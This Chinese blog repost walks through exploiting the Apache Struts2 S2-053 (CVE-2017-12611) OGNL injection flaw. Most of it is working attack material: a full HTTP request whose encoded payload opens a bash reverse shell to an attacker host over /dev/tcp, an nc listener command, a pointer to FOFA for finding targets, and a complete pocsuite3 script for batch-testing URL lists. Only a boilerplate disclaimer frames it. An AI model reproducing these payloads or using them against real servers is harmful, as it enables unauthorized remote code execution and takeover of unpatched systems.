-Struts2-053 远程命令执行漏洞,网络安全爱好者中心-神域博客网

本文转载于公众号：融云攻防实验室，原文地址：

漏洞复现-Struts2-053 远程命令执行漏洞

0x01 阅读须知

资源来源于网络，安全小天地只是再次进行分享，使用请遵循本站的免责申明

0x02 漏洞描述

Struts是Apache软件基金会（ASF）赞助的一个开源项目。它最初是Jakarta项目中的一个子项目，并在2004年3月成为ASF的顶级项目。它通过采用JavaServlet/JSP技术，实现了基于JavaEEWeb应用的Model-View-Controller（MVC）设计模式的应用框架，是MVC经典设计模式中的一个经典产品。在Struts2-053中，当开发者在Freemarker标签中使用如下代码时<@s.hidden name=”redirectUri” value=redirectUri />，<@s.hidden name=”redirectUri” value=”${redirectUri}” />，Freemarker会将值当做表达式进行执行，最后导致代码执行。

0x03 漏洞复现

漏洞影响:Struts 2.0.1-2.3.33 Struts 2.5-2.5.10

FOFA:Struts2

1.构造exp执行反弹shell命令


POST /hello.action HTTP/1.1
Host: x.x.x.x:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 884
Origin: http://x.x.x.x:8080
DNT: 1
Connection: close
Referer: http://x.x.x.x:8080/hello.action
Cookie: JSESSIONID=725C0B09B04404D9769BD21204F2F6CE
Upgrade-Insecure-Requests: 1

redirectUri=%25%7B(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3F(%23_memberAccess%3D%23dm)%3A((%23container%3D%23context%5B\'com.opensymphony.xwork2.ActionContext.container\'%5D).(%23ognlUtil%3D%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23cmd%3D\'bash%20-i%20%3E%26%20%2Fdev%2Ftcp%2Fx.x.x.x%2F7777%200%3E%261\').(%23iswin%3D(%40java.lang.System%40getProperty(\'os.name\').toLowerCase().contains(\'win\'))).(%23cmds%3D(%23iswin%3F%7B\'cmd.exe\'%2C\'%2Fc\'%2C%23cmd%7D%3A%7B\'%2Fbin%2Fbash\'%2C\'-c\'%2C%23cmd%7D)).(%23p%3Dnew%20java.lang.ProcessBuilder(%23cmds)).(%23p.redirectErrorStream(true)).(%23process%3D%23p.start()).(%40org.apache.commons.io.IOUtils%40toString(%23process.getInputStream()))%7D%0A

2.nc监听，得到一个shell

nc.exe -lvvp 7777

3.使用pocsuite3批量验证1.txt文件中的url是否存在该漏洞，显示一个成功一个失败。

pocsuite3下载地址：https://github.com/knownsec/pocsuite3

使用方法：
python3 cli.py -r pocs/struts2-053-poc.py -f 1.txt

poc：
# -*- coding:utf-8 -*-

from pocsuite3.api import Output, POCBase, register_poc, requests, logger
from pocsuite3.api import get_listener_ip, get_listener_port
from pocsuite3.api import REVERSE_PAYLOAD
from urllib.parse import urljoin
from pocsuite3.lib.utils import random_str


class DemoPOC(POCBase):
    vulID = \"CVE-2017-12611\"
    version =\'2.0.1-2.3.33,2.5-2.5.10\'
    author = [\"ry\"]
    vulDate = \"2019-12-27\"
    createDate = \"2019-12-27\"
    updateDate = \"2019-12-27\"
    references =[\"https://vulhub.org/#/environments/struts2/s2-053/\"]
    name =\"S2-053 Remote Code Execution Vulnerablity\"
    appPowerLink = \'\'
    appName = \'Strute2\'
    appVersion = \'2.x\'
    vulType = \'RCE\'
    desc = \'\'\'
    struts2-053远程代码执行漏洞
    \'\'\'
    samples = []
    install_requires = [\'\']

    def _verify(self):
        result = {}
        path = \"/hello.action\"
        url = urljoin(self.url,path)
        payload = \"redirectUri=%25%7B(%23dm%3D%40ognl.OgnlContext%40DEFAULT_MEMBER_ACCESS).(%23_memberAccess%3F(%23_memberAccess%3D%23dm)%3A((%23container%3D%23context%5B\'com.opensymphony.xwork2.ActionContext.container\'%5D).(%23ognlUtil%3D%23container.getInstance(%40com.opensymphony.xwork2.ognl.OgnlUtil%40class)).(%23ognlUtil.getExcludedPackageNames().clear()).(%23ognlUtil.getExcludedClasses().clear()).(%23context.setMemberAccess(%23dm)))).(%23cmd%3D\'echo%20ry\').(%23iswin%3D(%40java.lang.System%40getProperty(\'os.name\').toLowerCase().contains(\'win\'))).(%23cmds%3D(%23iswin%3F%7B\'cmd.exe\'%2C\'%2Fc\'%2C%23cmd%7D%3A%7B\'%2Fbin%2Fbash\'%2C\'-c\'%2C%23cmd%7D)).(%23p%3Dnew%20java.lang.ProcessBuilder(%23cmds)).(%23p.redirectErrorStream(true)).(%23process%3D%23p.start()).(%40org.apache.commons.io.IOUtils%40toString(%23process.getInputStream()))%7D%0A\"
        headers = {
                    \'User-Agent\': \'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.0\',
                    \'Content-Type\': \'application/x-www-form-urlencoded\'
                    }
        rr = requests.post(url=url,headers=headers,data=payload)
        try:
            if \"ry\" in rr.text:
                result[\'VerifyInfo\'] = {}
                result[\'VerifyInfo\'][\'URL\'] = url
                result[\'VerifyInfo\'][\'Name\'] = payload
        except Exception as e:
            pass
        return self.parse_output(result)
                
    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail(\'target is not vulnerable\')
        return output

    def _attack(self):
        return self._verify()
register_poc(DemoPOC)